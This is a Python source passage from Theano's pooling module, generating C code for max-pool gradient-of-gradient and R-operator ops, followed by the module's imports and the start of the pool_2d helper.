if self.openmp:
# run in parallel over each pooling block
omp_parallel = '#pragma omp parallel for private(r_st, r_end, r_pad_width, r_idx, i_idx, o_idx) schedule(static)'
else:
omp_parallel = ''
ccode = """
// sanity checks
int x_typenum = PyArray_ObjectType((PyObject*)%(x)s, 0);
int gz_typenum = PyArray_ObjectType((PyObject*)%(gz)s, 0);
if (x_typenum != gz_typenum)
{
PyErr_SetString(PyExc_ValueError, "input types must all match");
%(fail)s;
}
if(PyArray_NDIM(%(x)s)!=%(total_ndim)s)
{
PyErr_SetString(PyExc_ValueError, "x must be a %(total_ndim)sD ndarray");
%(fail)s;
}
if(PyArray_NDIM(%(gz)s)!=%(total_ndim)s)
{
PyErr_SetString(PyExc_ValueError, "gz must be a %(total_ndim)sD ndarray");
%(fail)s;
}
if(PyArray_DIM(%(ws)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "ws must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(stride)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "stride must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(pad)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "pad must be a vector of size %(nd)s");
%(fail)s;
}
int z[%(nd)s]; // shape of the output
int r[%(nd)s]; // shape of the padded_input
int ws[%(nd)s];
int st[%(nd)s];
int pd[%(nd)s];
int nonzero_padding;
nonzero_padding = 0;
for (int i=0; i<%(nd)s; i++)
{
ws[i] = *((npy_intp*)PyArray_GETPTR1(%(ws)s, i));
st[i] = *((npy_intp*)PyArray_GETPTR1(%(stride)s, i));
pd[i] = *((npy_intp*)PyArray_GETPTR1(%(pad)s, i));
z[i] = PyArray_DIMS(%(gz)s)[%(non_pool_ndim)s + i];
r[i] = PyArray_DIMS(%(x)s)[%(non_pool_ndim)s + i] + 2 * pd[i];
if (pd[i]>0)
nonzero_padding = 1;
}
if (!%(inc_pad)s && !%(sum_mode)s && nonzero_padding)
{
PyErr_SetString(PyExc_ValueError,
"padding must be zero for average_exc_pad");
%(fail)s;
}
// allocating memory for output, if necessary
int mem_nec;
mem_nec = 0;
if ((!%(gx)s) || !PyArray_ISCONTIGUOUS(%(gx)s)
|| *PyArray_DIMS(%(gx)s)!=%(total_ndim)s)
{
mem_nec = 1;
}
if (!mem_nec)
{
for (int i=0; i<%(total_ndim)s; i++)
{
if (PyArray_DIMS(%(gx)s)[i] != PyArray_DIMS(%(x)s)[i])
{
mem_nec = 1;
break;
}
}
}
if (mem_nec)
{
Py_XDECREF(%(gx)s);
%(gx)s = (PyArrayObject*) PyArray_ZEROS(%(total_ndim)s, PyArray_DIMS(%(x)s), x_typenum,0);
}
else {
PyArray_FILLWBYTE(%(gx)s, 0);
}
int z_prod;
// do not run if any z[i] is zero
z_prod = 1;
for (int i=0; i<%(nd)s; i++)
{
z_prod *= z[i];
}
if (z_prod)
{
// will be used to hold start and end index of a region
int r_st[%(nd)s];
int r_end[%(nd)s];
// padded region size
int r_pad_width[%(nd)s];
// index for iterating over the pooling regions
int r_idx[%(nd)s];
// placeholder for PyArray indexing (output)
npy_intp o_idx[%(total_ndim)s];
// placeholder for PyArray indexing (input)
npy_intp i_idx[%(total_ndim)s];
// loop over non-pooling dimensions
int non_pooling_prod = 1;
for (int i=0; i<%(non_pool_ndim)s; i++)
{
non_pooling_prod *= PyArray_DIMS(%(x)s)[i];
}
%(omp_parallel)s
// first loop over non-pooling dimensions
for (int t=0; t<non_pooling_prod; t++)
{
// compute the non-pooling index in each dimension
if (%(non_pool_ndim)s!=0)
{
o_idx[0] = t;
i_idx[0] = t;
for (int i=1; i<%(non_pool_ndim)s; i++)
{
o_idx[i] = o_idx[i - 1] / PyArray_DIMS(%(x)s)[i - 1];
o_idx[i - 1] =o_idx[i - 1] %% PyArray_DIMS(%(x)s)[i - 1];
i_idx[i] = o_idx[i];
i_idx[i - 1] = o_idx[i - 1];
}
}
// then loop over each region in each pooling dimension
"""
for i in xrange(nd):
ccode += """
for (r_idx[%(i)s]=0; r_idx[%(i)s] < z[%(i)s]; r_idx[%(i)s]++) {
r_st[%(i)s] = r_idx[%(i)s] * st[%(i)s];
if (!%(sum_mode)s && !%(inc_pad)s && r_st[%(i)s] < pd[%(i)s])
{
r_st[%(i)s] = pd[%(i)s];
}
r_end[%(i)s] = r_st[%(i)s] + ws[%(i)s];
r_end[%(i)s] = r_end[%(i)s] > r[%(i)s] ? r[%(i)s] : r_end[%(i)s];
r_pad_width[%(i)s] = r_end[%(i)s] - r_st[%(i)s];
// from padded_img space to img space
r_st[%(i)s] = r_st[%(i)s] - pd[%(i)s] > 0 ? r_st[%(i)s] - pd[%(i)s] : 0;
r_end[%(i)s] = r_end[%(i)s] > r[%(i)s] - pd[%(i)s] ? r[%(i)s] - 2 * pd[%(i)s] : r_end[%(i)s] - pd[%(i)s];
// use the index to find the correct position in the output
o_idx[%(non_pool_ndim)s + %(i)s] = r_idx[%(i)s];
""" % dict(i=i, sum_mode=sum_mode, inc_pad=inc_pad, non_pool_ndim=non_pool_ndim)
ccode += """
dtype_%(gz)s * gz;
dtype_%(gz)s val;
if (%(total_ndim)s == 4)
{
// the gradient for this region
gz = ((dtype_%(gz)s*)(PyArray_GETPTR4(%(gz)s, o_idx[0],o_idx[1],o_idx[2],o_idx[3])));
}
else
{
// the gradient for this region
gz = ((dtype_%(gz)s*)(PyArray_GetPtr(%(gz)s, o_idx)));
}
// compute the contribution
if (%(sum_mode)s)
{
val = gz[0];
}
else
{
val = gz[0] / (%(region_size)s);
}
"""
region_size = ' * '.join('r_pad_width[%d]' % i for i in xrange(nd))
for i in xrange(nd):
ccode += """
// go through the pooled region in the unpadded input
for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
{
i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
dtype_%(gx)s * gx;
if (%(total_ndim)s == 4)
{
gx = ((dtype_%(gx)s*)(PyArray_GETPTR4(%(gx)s, i_idx[0],i_idx[1],i_idx[2],i_idx[3])));
}
else
{
gx = ((dtype_%(gx)s*)(PyArray_GetPtr(%(gx)s, i_idx)));
}
gx[0] = gx[0] + val;
"""
for i in xrange(nd):
ccode += """
} // for loop over region
"""
for i in xrange(nd):
ccode += """
} // loop over pooling dimension
"""
ccode += """
} // for loop over non-pooling dimensions
} // if z_prod
"""
return ccode % locals()
def c_code_cache_version(self):
return (0, 3, self.openmp)
class DownsampleFactorMaxGradGrad(OpenMPOp):
__props__ = ('ignore_border', 'mode', 'ndim')
def __init__(self, ignore_border, mode='max', ndim=2, openmp=None):
self.ndim = ndim
self.ignore_border = ignore_border
self.mode = mode
super(DownsampleFactorMaxGradGrad, self).__init__(openmp=openmp)
assert self.mode == 'max'
def make_node(self, x, maxout, gz, ws, stride=None, pad=None):
# make_node should only be called by the grad function of
# MaxPoolGrad, so these asserts should not fail.
x = tensor.as_tensor_variable(x)
maxout = tensor.as_tensor_variable(maxout)
gz = tensor.as_tensor_variable(gz)
nd = self.ndim
if stride is None:
stride = ws
if pad is None:
pad = (0,) * nd
elif isinstance(pad, (tuple, list)):
if max(pad) != 0 and not self.ignore_border:
raise NotImplementedError(
'padding works only with ignore_border=True')
if isinstance(ws, (tuple, list)):
if any(pad[i] >= ws[i] for i in range(nd)):
raise NotImplementedError(
'padding must be smaller than strides')
ws = tensor.as_tensor_variable(ws)
stride = tensor.as_tensor_variable(stride)
pad = tensor.as_tensor_variable(pad)
assert ws.ndim == 1
assert stride.ndim == 1
assert pad.ndim == 1
assert x.ndim == maxout.ndim == gz.ndim >= nd
if ws.dtype not in tensor.int_dtypes:
raise TypeError('Pool downsample parameters must be ints.')
if stride.dtype not in tensor.int_dtypes:
raise TypeError('Stride parameters must be ints.')
if pad.dtype not in tensor.int_dtypes:
raise TypeError('Padding parameters must be ints.')
return Apply(self, [x, maxout, gz, ws, stride, pad], [x.type()])
def perform(self, node, inp, out):
x, maxout, ggx, ws, stride, pad = inp
z, = out
nd = self.ndim
assert ws.shape == stride.shape == pad.shape == (nd,)
if len(x.shape) < nd:
raise NotImplementedError(
'DownsampleFactorMaxGradGrad requires input '
'with {} or more dimensions'.format(nd))
if (z[0] is None) or (z[0].shape != maxout.shape):
z[0] = np.zeros(maxout.shape, dtype=x.dtype)
ggz = z[0] # grad wrt maxout_grad has the same shape as maxout
# size of pooling output
pool_out_shp = ggz.shape[-nd:]
img_shp = tuple(x.shape[-nd + i] + 2 * pad[i] for i in xrange(nd))
# pad the image and its gradients
if max(pad) > 0:
y_padded = np.zeros(x.shape[:-nd] + img_shp, dtype=x.dtype)
y_padded[(slice(None),) * (len(x.shape) - nd) +
tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = x
ggx_padded = np.zeros(x.shape[:-nd] + img_shp, dtype=x.dtype)
ggx_padded[(slice(None),) * (len(x.shape) - nd) +
tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = ggx
else:
y_padded = x
ggx_padded = ggx
# precompute the region boundaries for each dimension
region_ranges = [[] for i in xrange(nd)]
for i in xrange(nd):
for j in xrange(pool_out_shp[i]):
start = j * stride[i]
end = builtins.min(start + ws[i], img_shp[i])
region_ranges[i].append(xrange(start, end))
# iterate over non-pooling dimensions
for k in np.ndindex(*x.shape[:-nd]):
ggxk = ggx_padded[k]
ggzk = ggz[k]
yk = y_padded[k]
maxoutk = maxout[k]
# iterate over pooling regions
for r in np.ndindex(*pool_out_shp):
# iterate inside region
maxout_value = maxoutk[r]
for c in itertools.product(*[region_ranges[i][r[i]]
for i in xrange(nd)]):
if maxout_value == yk[c]:
ggzk[r] += ggxk[c]
def infer_shape(self, node, in_shapes):
return [in_shapes[1]]
def grad(self, inp, grads):
x, maxout, ggx, ws, stride, pad = inp
gz, = grads
return [theano.tensor.zeros_like(x),
theano.tensor.zeros_like(maxout),
MaxPoolGrad(ignore_border=self.ignore_border,
ndim=self.ndim)(x, maxout, gz,
ws, stride, pad),
DisconnectedType()(),
DisconnectedType()(),
DisconnectedType()()]
def connection_pattern(self, node):
return [[1], [1], [1], [0], [0], [0]]
def c_code(self, node, name, inp, out, sub):
if self.mode != 'max':
raise theano.gof.utils.MethodNotDefined()
x, maxout, ggx, ws, stride, pad = inp
z, = out # the grad of grad
nd = self.ndim
total_ndim = node.inputs[0].ndim
non_pool_ndim = total_ndim - nd
fail = sub['fail']
if self.openmp:
# run in parallel over each pooling block
omp_parallel = '#pragma omp parallel for private(r_st, r_end, r_idx, i_idx, o_idx, maximum) schedule(static)'
else:
omp_parallel = ''
ccode = """
int z_typenum = PyArray_ObjectType((PyObject*)%(maxout)s, 0);
int z[%(nd)s]; // shape of the output
int r[%(nd)s]; // shape of the padded_input
int ws[%(nd)s];
int st[%(nd)s];
int pd[%(nd)s];
if(PyArray_DIM(%(ws)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "ws must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(stride)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "stride must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(pad)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "pad must be a vector of size %(nd)s");
%(fail)s;
}
for (int i=0; i<%(nd)s; i++)
{
ws[i] = *((npy_intp*)PyArray_GETPTR1(%(ws)s, i));
st[i] = *((npy_intp*)PyArray_GETPTR1(%(stride)s, i));
pd[i] = *((npy_intp*)PyArray_GETPTR1(%(pad)s, i));
z[i] = PyArray_DIMS(%(maxout)s)[%(non_pool_ndim)s + i];
r[i] = PyArray_DIMS(%(x)s)[%(non_pool_ndim)s + i] + 2 * pd[i];
}
// allocating memory for output, if necessary
int mem_nec;
mem_nec = 0;
if ((!%(z)s) || !PyArray_ISCONTIGUOUS(%(z)s)
|| *PyArray_DIMS(%(z)s)!=%(total_ndim)s)
{
mem_nec = 1;
}
if (!mem_nec)
{
for (int i=0; i<%(total_ndim)s; i++)
{
if (PyArray_DIMS(%(z)s)[i] != PyArray_DIMS(%(maxout)s)[i])
{
mem_nec = 1;
break;
}
}
}
if (mem_nec)
{
Py_XDECREF(%(z)s);
%(z)s = (PyArrayObject*) PyArray_ZEROS(%(total_ndim)s, PyArray_DIMS(%(maxout)s), z_typenum,0);
}
else {
PyArray_FILLWBYTE(%(z)s, 0);
}
dtype_%(maxout)s maximum; // temp var for maximum value in a region
// will be used to hold start and end index of a region
int r_st[%(nd)s];
int r_end[%(nd)s];
// index for iterating over the pooling regions
int r_idx[%(nd)s];
// placeholder for PyArray indexing (output)
npy_intp o_idx[%(total_ndim)s];
// placeholder for PyArray indexing (input)
npy_intp i_idx[%(total_ndim)s];
// loop over non-pooling dimensions
int non_pooling_prod;
non_pooling_prod = 1;
for (int i=0; i<%(non_pool_ndim)s; i++)
{
non_pooling_prod *= PyArray_DIMS(%(x)s)[i];
}
%(omp_parallel)s
// first loop over non-pooling dimensions
for (int t=0; t<non_pooling_prod; t++)
{
// compute the non-pooling index in each dimension
if (%(non_pool_ndim)s!=0)
{
o_idx[0] = t;
i_idx[0] = t;
for (int i=1; i<%(non_pool_ndim)s; i++)
{
o_idx[i] = o_idx[i - 1] / PyArray_DIMS(%(x)s)[i - 1];
o_idx[i - 1] = o_idx[i - 1] %% PyArray_DIMS(%(x)s)[i - 1];
i_idx[i] = o_idx[i];
i_idx[i - 1] = o_idx[i - 1];
}
}
// then loop over each region in each pooling dimension
"""
for i in xrange(nd):
ccode += """
for (r_idx[%(i)s]=0; r_idx[%(i)s] < z[%(i)s]; r_idx[%(i)s]++) {
r_st[%(i)s] = r_idx[%(i)s] * st[%(i)s];
r_end[%(i)s] = r_st[%(i)s] + ws[%(i)s];
// skip the padding
r_st[%(i)s] = r_st[%(i)s] < pd[%(i)s] ? pd[%(i)s] : r_st[%(i)s];
r_end[%(i)s] = r_end[%(i)s] > (r[%(i)s] - pd[%(i)s]) ? r[%(i)s] - pd[%(i)s] : r_end[%(i)s];
// from padded_img space to img space
r_st[%(i)s] -= pd[%(i)s];
r_end[%(i)s] -= pd[%(i)s];
// use the index to find the correct position in the output
o_idx[%(non_pool_ndim)s + %(i)s] = r_idx[%(i)s];
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
dtype_%(z)s * z;
if (%(total_ndim)s == 4)
{
// the maximum value
maximum = ((dtype_%(maxout)s*)(PyArray_GETPTR4(%(maxout)s,o_idx[0],o_idx[1],o_idx[2],o_idx[3])))[0];
// z at this position
z = ((dtype_%(z)s*)(PyArray_GETPTR4(%(z)s,o_idx[0],o_idx[1],o_idx[2],o_idx[3])));
}
else
{
// the maximum value
maximum = ((dtype_%(maxout)s*)(PyArray_GetPtr(%(maxout)s,o_idx)))[0];
// z at this position
z = ((dtype_%(z)s*)(PyArray_GetPtr(%(z)s,o_idx)));
}
"""
for i in xrange(nd):
ccode += """
// go through the pooled region in the unpadded input
for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
{
i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
dtype_%(x)s a;
dtype_%(ggx)s * ggx;
if (%(total_ndim)s == 4)
{
a = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
ggx = ((dtype_%(ggx)s*)(PyArray_GETPTR4(%(ggx)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])));
}
else
{
a = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
ggx = ((dtype_%(ggx)s*)(PyArray_GetPtr(%(ggx)s,i_idx)));
}
if (a == maximum){
z[0] += ggx[0];
}
"""
for i in xrange(nd):
ccode += """
} // for loop over region
"""
for i in xrange(nd):
ccode += """
} // loop over pooling dimension
"""
ccode += """
} // for loop over non-pooling dimensions
"""
return ccode % locals()
def c_code_cache_version(self):
return (0, 4, self.openmp)
class MaxPoolRop(OpenMPOp):
"""
Implements the R-operator for the downsample operation.
Parameters
----------
ws : list or tuple of N ints
Downsample factor over rows, columns etc.
ws indicates the size of the pooling region.
ignore_border : bool
If ws doesn't divide imgshape, do we include an extra row/col/slice
of partial downsampling (False) or ignore it (True).
stride : list or tuple of N ints or None
Stride size, which is the number of shifts over rows/cols/slices to get the
next pool region. If stride is None, it is considered equal to ws
(no overlap on pooling regions).
pad : tuple of N ints or None
For each downsampling dimension, this specifies the number of zeros to
add as padding on both sides. For 2D and (pad_h, pad_w), pad_h specifies the
size of the top and bottom margins, pad_w specifies the size of the left and
right margins. No padding is added if pad is None.
mode : {'max', 'sum', 'average_inc_pad', 'average_exc_pad'}
('average_inc_pad' excludes the padding from the count,
'average_exc_pad' include it)
ndim : int
The number of pooling dimensions N.
The default is 2.
"""
__props__ = ('ignore_border', 'mode', 'ndim')
params_type = ParamsType(ignore_border=bool_t,)
def __init__(self, ignore_border=False, mode='max', ndim=2, openmp=None):
super(MaxPoolRop, self).__init__(openmp=openmp)
self.ndim = ndim
self.ignore_border = ignore_border
self.mode = mode
assert mode == 'max'
def make_node(self, x, eval_point, ws, stride=None, pad=None):
# TODO: consider restricting the dtype?
x = tensor.as_tensor_variable(x)
eval_point = tensor.as_tensor_variable(eval_point)
nd = self.ndim
if stride is None:
stride = ws
if pad is None:
pad = (0,) * nd
elif isinstance(pad, (tuple, list)):
if max(pad) != 0 and not self.ignore_border:
raise NotImplementedError(
'padding works only with ignore_border=True')
if isinstance(ws, (tuple, list)):
if any(pad[i] >= ws[i] for i in range(nd)):
raise NotImplementedError(
'padding must be smaller than strides')
ws = tensor.as_tensor_variable(ws)
stride = tensor.as_tensor_variable(stride)
pad = tensor.as_tensor_variable(pad)
assert ws.ndim == 1
assert stride.ndim == 1
assert pad.ndim == 1
if x.type.ndim < nd:
raise TypeError()
if not ws.dtype.startswith('int'):
raise TypeError('Pool downsample parameters must be ints.')
if not stride.dtype.startswith('int'):
raise TypeError('Stride parameters must be ints.')
if not pad.dtype.startswith('int'):
raise TypeError('Padding parameters must be ints.')
# If the input shape are broadcastable we can have 0 in the output shape
broad = x.broadcastable[:-nd] + (False,) * nd
out = tensor.TensorType(eval_point.dtype, broad)
return gof.Apply(self, [x, eval_point, ws, stride, pad], [out()])
def perform(self, node, inp, out, params):
x, ex, ws, stride, pad = inp
z, = out
nd = self.ndim
assert ws.shape == stride.shape == pad.shape == (nd,)
if len(x.shape) < nd:
raise NotImplementedError(
'Pool requires input with {} or more dimensions'.format(nd))
z_shape = Pool.out_shape(x.shape, ws, params.ignore_border, stride, pad, nd)
if not self.ignore_border:
assert all(z > 0 for z in z_shape[-nd:])
if (z[0] is None) or (z[0].shape != z_shape):
z[0] = np.empty(z_shape, dtype=x.dtype)
zz = z[0]
# size of pooling output
pool_out_shp = zz.shape[-nd:]
img_shp = tuple(x.shape[-nd + i] + 2 * pad[i] for i in xrange(nd))
inc_pad = self.mode == 'average_inc_pad'
# pad the image and the eval point
if max(pad) != 0:
y = np.zeros(x.shape[:-nd] + img_shp, dtype=x.dtype)
y[(slice(None),) * (len(x.shape) - nd) +
tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = x
ey = np.zeros(ex.shape[:-nd] + img_shp, dtype=ex.dtype)
ey[(slice(None),) * (len(ex.shape) - nd) +
tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = ex
else:
y = x
ey = ex
# precompute the region boundaries for each dimension
region_slices = [[] for i in xrange(nd)]
for i in xrange(nd):
for j in xrange(pool_out_shp[i]):
start = j * stride[i]
end = builtins.min(start + ws[i], img_shp[i])
if not inc_pad:
start = builtins.max(start, pad[i])
end = builtins.min(end, img_shp[i] - pad[i])
region_slices[i].append(slice(start, end))
# iterate over non-pooling dimensions
for k in np.ndindex(*x.shape[:-nd]):
zzk = zz[k]
yk = y[k]
eyk = ey[k]
# iterate over pooling regions
for r in np.ndindex(*pool_out_shp):
# current slice in padded input
ykslice = yk[[region_slices[i][r[i]] for i in xrange(nd)]]
# current slice in eval points
eykslice = eyk[[region_slices[i][r[i]] for i in xrange(nd)]]
# indices of maximum
idx = np.unravel_index(np.argmax(ykslice), ykslice.shape)
zzk[r] = eykslice[idx]
def c_headers(self):
headers = ['<algorithm>']
headers += super(MaxPoolRop, self).c_headers()
return headers
def c_code(self, node, name, inp, out, sub):
if self.mode != 'max':
raise theano.gof.utils.MethodNotDefined()
x, ex, ws, stride, pad = inp
z, = out
nd = self.ndim
total_ndim = node.inputs[0].ndim
non_pool_ndim = total_ndim - nd
fail = sub['fail']
params = sub['params']
if self.openmp:
# run in parallel over each pooling block
omp_parallel = '#pragma omp parallel for private(r_st, r_end, r_idx, i_idx, o_idx, collector, eval_collector) schedule(static)'
else:
omp_parallel = ''
ccode = """
int typenum = PyArray_ObjectType((PyObject*)%(x)s, 0);
if(PyArray_NDIM(%(x)s)!=%(total_ndim)s)
{
PyErr_SetString(PyExc_ValueError, "x must be a %(total_ndim)sD ndarray");
%(fail)s;
}
if(PyArray_NDIM(%(ex)s)!=%(total_ndim)s)
{
PyErr_SetString(PyExc_ValueError, "eval_point must be a %(total_ndim)sD ndarray");
%(fail)s;
}
if(PyArray_DIM(%(ws)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "ws must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(stride)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "stride must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(pad)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "pad must be a vector of size %(nd)s");
%(fail)s;
}
int z[%(nd)s]; // shape of the output
int r[%(nd)s]; // shape of the padded_input
int ws[%(nd)s];
int st[%(nd)s];
int pd[%(nd)s];
int nonzero_padding;
nonzero_padding = 0;
for (int i=0; i<%(nd)s; i++)
{
ws[i] = *((npy_intp*)PyArray_GETPTR1(%(ws)s, i));
st[i] = *((npy_intp*)PyArray_GETPTR1(%(stride)s, i));
pd[i] = *((npy_intp*)PyArray_GETPTR1(%(pad)s, i));
r[i] = PyArray_DIMS(%(x)s)[%(non_pool_ndim)s + i] + 2 * pd[i];
if (pd[i]>0)
nonzero_padding = 1;
}
if (!%(params)s->ignore_border && nonzero_padding)
{
PyErr_SetString(PyExc_ValueError,
"padding must be zero when ignore border is False");
%(fail)s;
}
if (%(params)s->ignore_border)
{
for (int i=0; i<%(nd)s; i++)
{
// '/' in C is different from '/' in python
if (r[i] - ws[i] < 0)
{
z[i] = 0;
}
else
{
z[i] = (r[i] - ws[i]) / st[i] + 1;
}
}
}
else
{
for (int i=0; i<%(nd)s; i++)
{
// decide how many rows/cols the output has
if (st[i] >= ws[i])
{
z[i] = (r[i] - 1) / st[i] + 1;
}
else
{
z[i] = std::max(0, (r[i] - 1 - ws[i] + st[i]) / st[i]) + 1;
}
assert(z[i] > 0);
}
}
// memory allocation of z if necessary
int mem_nec;
mem_nec = 0;
if ((!%(z)s) || *PyArray_DIMS(%(z)s)!=%(total_ndim)s)
{
mem_nec = 1;
}
if (!mem_nec)
{
for (int i=0; i<%(non_pool_ndim)s; i++)
{
if (PyArray_DIMS(%(z)s)[i] != PyArray_DIMS(%(x)s)[i])
{
mem_nec = 1;
break;
}
}
}
if (!mem_nec)
{
for (int i=0; i<%(nd)s; i++)
{
if (PyArray_DIMS(%(z)s)[%(non_pool_ndim)s + i] != z[i])
{
mem_nec = 1;
break;
}
}
}
if (mem_nec)
{
if (%(z)s) Py_XDECREF(%(z)s);
npy_intp dims[%(total_ndim)s];
for (int i=0; i<%(non_pool_ndim)s; i++)
{
dims[i] = PyArray_DIMS(%(x)s)[i];
}
for (int i=0; i<%(nd)s; i++)
{
dims[%(non_pool_ndim)s + i] = z[i];
}
//TODO: zeros not necessary
%(z)s = (PyArrayObject*) PyArray_ZEROS(%(total_ndim)s, dims, typenum,0);
}
// initialize temp var for the value in a region
dtype_%(x)s collector;
dtype_%(ex)s eval_collector;
int z_prod;
// do not run if any z[i] is zero
z_prod = 1;
for (int i=0; i<%(nd)s; i++)
{
z_prod *= z[i];
}
if (z_prod)
{
// will be used to hold start and end index of a region
int r_st[%(nd)s];
int r_end[%(nd)s];
// index for iterating over the pooling regions
int r_idx[%(nd)s];
// placeholder for PyArray indexing (output)
npy_intp o_idx[%(total_ndim)s];
// placeholder for PyArray indexing (input)
npy_intp i_idx[%(total_ndim)s];
// loop over non-pooling dimensions
int non_pooling_prod = 1;
for (int i=0; i<%(non_pool_ndim)s; i++)
{
non_pooling_prod *= PyArray_DIMS(%(x)s)[i];
}
%(omp_parallel)s
// first loop over non-pooling dimensions
for (int t=0; t<non_pooling_prod; t++)
{
// compute the non-pooling index in each dimension
if (%(non_pool_ndim)s!=0)
{
o_idx[0] = t;
i_idx[0] = t;
for (int i=1; i<%(non_pool_ndim)s; i++)
{
o_idx[i] = o_idx[i - 1] / PyArray_DIMS(%(x)s)[i - 1];
o_idx[i - 1] = o_idx[i - 1] %% PyArray_DIMS(%(x)s)[i - 1];
i_idx[i] = o_idx[i];
i_idx[i - 1] = o_idx[i - 1];
}
}
// then loop over each region in each pooling dimension
"""
for i in xrange(nd):
ccode += """
for (r_idx[%(i)s]=0; r_idx[%(i)s] < z[%(i)s]; r_idx[%(i)s]++) {
r_st[%(i)s] = r_idx[%(i)s] * st[%(i)s];
r_end[%(i)s] = r_st[%(i)s] + ws[%(i)s];
// skip the padding
r_st[%(i)s] = r_st[%(i)s] < pd[%(i)s] ? pd[%(i)s] : r_st[%(i)s];
r_end[%(i)s] = r_end[%(i)s] > (r[%(i)s] - pd[%(i)s]) ? r[%(i)s] - pd[%(i)s] : r_end[%(i)s];
// from padded_img space to img space
r_st[%(i)s] -= pd[%(i)s];
r_end[%(i)s] -= pd[%(i)s];
// handle the case where no padding, ignore border is True
if (%(params)s->ignore_border)
{
r_end[%(i)s] = r_end[%(i)s] > r[%(i)s] ? r[%(i)s] : r_end[%(i)s];
}
// use the index to find the correct position in the output
o_idx[%(non_pool_ndim)s + %(i)s] = r_idx[%(i)s];
""" % dict(i=i, params=sub['params'], non_pool_ndim=non_pool_ndim)
ccode += """
// get a pointer to the correct position in the output
dtype_%(z)s * z;
if (%(total_ndim)s == 4)
z = ((dtype_%(z)s*)(PyArray_GETPTR4(%(z)s, o_idx[0], o_idx[1], o_idx[2], o_idx[3])));
else
z = ((dtype_%(z)s*)(PyArray_GetPtr(%(z)s, o_idx)));
"""
for i in xrange(nd):
ccode += """
// set the first index of dimension %(i)s
i_idx[%(non_pool_ndim)s + %(i)s] = r_st[%(i)s];
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
// use the first element as the initial value of collector
if (%(total_ndim)s == 4) {
collector = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
eval_collector = ((dtype_%(ex)s*)(PyArray_GETPTR4(%(ex)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
} else {
collector = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
eval_collector = ((dtype_%(ex)s*)(PyArray_GetPtr(%(ex)s,i_idx)))[0];
}
"""
for i in xrange(nd):
ccode += """
// go through the pooled region in the unpadded input
for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
{
i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
// update maximum
dtype_%(x)s a;
dtype_%(ex)s ea;
if (%(total_ndim)s == 4) {
a = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
ea = ((dtype_%(ex)s*)(PyArray_GETPTR4(%(ex)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
}
else {
a = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
ea = ((dtype_%(ex)s*)(PyArray_GetPtr(%(ex)s,i_idx)))[0];
}
if (a > collector) {
collector = a;
eval_collector = ea;
}
"""
for i in xrange(nd):
ccode += """
} // for loop over region
"""
ccode += """
z[0] = eval_collector;
"""
for i in xrange(nd):
ccode += """
} // loop over pooling dimension
"""
ccode += """
} // for loop over non-pooling dimensions
} // if z_prod
"""
return ccode % locals()
def c_code_cache_version(self):
return (1, self.openmp)
| 39.595865 | 139 | 0.490106 |
from __future__ import absolute_import, print_function, division
import warnings
import itertools
import numpy as np
from six.moves import xrange
import six.moves.builtins as builtins
import theano
from theano import gof, OpenMPOp, tensor, Variable, Apply
from theano.gof import ParamsType, EnumList
from theano.gradient import DisconnectedType
from theano.scalar import bool as bool_t
def max_pool_2d_same_size(input, patch_size):
output = Pool(True)(input, patch_size)
outs = MaxPoolGrad(True)(input, output, output, patch_size)
return outs
def pool_2d(input, ws=None, ignore_border=None, stride=None, pad=(0, 0),
mode='max', ds=None, st=None, padding=None):
if ds is not None:
if ws is not None:
raise ValueError(
"You can't provide a tuple value to both 'ws' and 'ds'."
" Please provide a value only to 'ws'."
)
else:
warnings.warn(
"DEPRECATION: the 'ds' parameter is not going to exist"
" anymore as it is going to be replaced by the parameter"
" 'ws'.",
stacklevel=2
)
ws = ds
elif ds is None and ws is None:
raise ValueError(
"You must provide a tuple value for the window size."
)
if st is not None:
if stride is not None:
raise ValueError(
"You can't provide a tuple value to both 'st and 'stride'."
" Please provide a value only to 'stride'."
